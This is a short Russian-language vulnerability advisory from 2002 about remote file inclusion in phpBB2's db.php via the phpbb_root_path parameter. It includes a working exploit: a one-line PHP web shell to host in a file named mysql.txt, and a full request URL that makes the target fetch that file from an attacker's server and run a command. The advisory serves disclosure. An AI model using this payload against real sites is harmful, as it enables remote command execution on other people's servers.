Security Lab

Выполенение произвольных команд в PhpBB2

Дата публикации:19.03.2002
Всего просмотров:2298
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: PhpBB2 – мощный, полностью масштабируемый, пакет для создания форумов.
Переменная Phpbb_root_path принимает сценарии от внешних серверов, позволяя удаленному нападающему выполнять произвольные команды.

Уязвимость найдена в сценарии db.php:

input: '/phpBB2/includes/db.php?phpbb_root_path=full_path_to_script'

Где full_path_to_script может быть URL c другого Web сервера. Например, создайте директорию 'db' на вашем Web сервере. Затем в этой директории создайте файл 'mysql.txt' или 'mysql4.txt' или 'postgres.txt' (другие имена почему-то не срабатывают).
 

Этот mysql.txt должен содержать эту строку:

<? echo "<pre>"; system($cmd); ?>

следующий URL:

http://example.com/phpBB2/includes/db.php?phpbb_root_path=http://your_http_server/&dbms=mysql&phpEx=txt&cmd=uname%20-a

выдаст 'uname result' на example.com

Ссылки: Источник